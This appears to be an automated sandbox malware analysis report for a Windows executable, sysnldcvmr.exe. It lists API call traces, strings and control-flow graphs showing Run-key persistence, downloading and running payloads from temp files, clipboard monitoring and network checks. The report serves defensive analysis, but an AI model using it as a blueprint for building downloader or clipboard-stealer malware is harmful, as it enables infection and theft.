                                                                                                                                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                                                                                                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                    • String ID: Bz@
                                                                                                                                                                                                                                                    • API String ID: 1815803762-793989200
                                                                                                                                                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                                                                                                                                    • Opcode ID: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
                                                                                                                                                                                                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 0040759E
                                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,753f85d83d), ref: 004075AD
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000105), ref: 00407602
                                                                                                                                                                                                                                                    • PathFindFileNameW.SHLWAPI(C:\Windows\sysnldcvmr.exe), ref: 0040760D
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040763A
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                                                                                                                                                                                                    • wcscmp.NTDLL ref: 00407663
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysnldcvmr.exe$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                                                                                                                                                                                                    • API String ID: 4172876685-2147295483
                                                                                                                                                                                                                                                    • Opcode ID: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
                                                                                                                                                                                                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                                                                                                                                                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                                                                                                                                                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040EB39
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED41
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED55
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.ou
                                                                                                                                                                                                                                                    • API String ID: 3709769524-481826255
                                                                                                                                                                                                                                                    • Opcode ID: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
                                                                                                                                                                                                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 92 40aea0-40aeb7 call 40add0 95 40aeb9 92->95 96 40aebe-40aeda call 40aa20 strcmp 92->96 97 40b145-40b148 95->97 100 40aee1-40aefd call 40aa20 strstr 96->100 101 40aedc 96->101 104 40af40-40af5c call 40aa20 strstr 100->104 105 40aeff-40af1b call 40aa20 strstr 100->105 101->97 112 40af5e-40af7a call 40aa20 strstr 104->112 113 40af9f-40afbb call 40aa20 strstr 104->113 110 40af3b 105->110 111 40af1d-40af39 call 40aa20 strstr 105->111 110->97 111->104 111->110 120 40af9a 112->120 121 40af7c-40af98 call 40aa20 strstr 112->121 122 40afbd-40afd9 call 40aa20 strstr 113->122 123 40affe-40b014 EnterCriticalSection 113->123 120->97 121->113 121->120 134 40aff9 122->134 135 40afdb-40aff7 call 40aa20 strstr 122->135 124 40b01f-40b028 123->124 127 40b059-40b064 call 40b150 124->127 128 40b02a-40b03a 124->128 141 40b13a-40b13f LeaveCriticalSection 127->141 142 40b06a-40b078 127->142 131 40b057 128->131 132 40b03c-40b055 call 40d4a0 128->132 131->124 132->127 134->97 135->123 135->134 141->97 144 40b07a 142->144 145 40b07e-40b080 call 409d90 142->145 144->145 147 40b085-40b08f 145->147 147->141 148 40b095-40b0b2 call 40d4a0 147->148 151 40b0b4-40b0c4 148->151 152 40b10a-40b122 148->152 153 40b0d0-40b108 call 40a1b0 151->153 154 40b0c6-40b0ce Sleep 151->154 155 40b128-40b133 call 40b150 152->155 153->155 154->151 155->141 160 40b135 call 40ab80 155->160 160->141
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                                                                                                                                                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                                                                                                                                                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                                                                                                                                                    • Opcode ID: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
                                                                                                                                                                                                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 162 405970-405992 GetWindowLongW 163 405994-40599b 162->163 164 4059b6-4059bd 162->164 165 4059a1-4059a5 163->165 166 405a27-405a38 IsClipboardFormatAvailable 163->166 167 4059e6-4059ec 164->167 168 4059bf 164->168 169 4059c4-4059e1 SetClipboardViewer SetWindowLongW 165->169 170 4059a7-4059ab 165->170 174 405a43-405a4d IsClipboardFormatAvailable 166->174 175 405a3a-405a41 166->175 172 405a06-405a0a 167->172 173 4059ee-405a04 SetWindowLongW 167->173 171 405ba4-405bbd DefWindowProcA 168->171 169->171 176 4059b1 170->176 177 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 170->177 178 405a22 172->178 179 405a0c-405a1c SendMessageA 172->179 173->178 181 405a58-405a62 IsClipboardFormatAvailable 174->181 182 405a4f-405a56 174->182 180 405a6b-405a6f 175->180 176->171 177->171 178->171 179->178 184 405a75-405a7f OpenClipboard 180->184 185 405b3f-405b43 180->185 181->180 183 405a64 181->183 182->180 183->180 184->185 186 405a85-405a96 GetClipboardData 184->186 187 405b45-405b55 SendMessageA 185->187 188 405b5b 185->188 189 405a98 186->189 190 405a9d-405aae GlobalLock 186->190 187->188 188->171 189->171 191 405ab0 190->191 192 405ab5-405ac6 190->192 191->171 193 405ac8-405acc 192->193 194 405ae9-405afc call 405690 192->194 196 405afe-405b0e call 4057b0 193->196 197 405ace-405ad2 193->197 202 405b11-405b25 GlobalUnlock CloseClipboard 194->202 196->202 200 405ad4 197->200 201 405ad6-405ae7 call 405570 197->201 200->202 201->202 202->185 205 405b27-405b3c call 404970 call 40a1b0 202->205 205->185
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                                                                                                                                                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                                                                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                                                                                                                                                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                                                                                                                                                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                                                                                                                                                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                                                                                                                                                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3549449529-0
                                                                                                                                                                                                                                                    • Opcode ID: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
                                                                                                                                                                                                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000104), ref: 00406BE0
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                                                                                                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                                                                                                                                                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                                                                                                                                                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
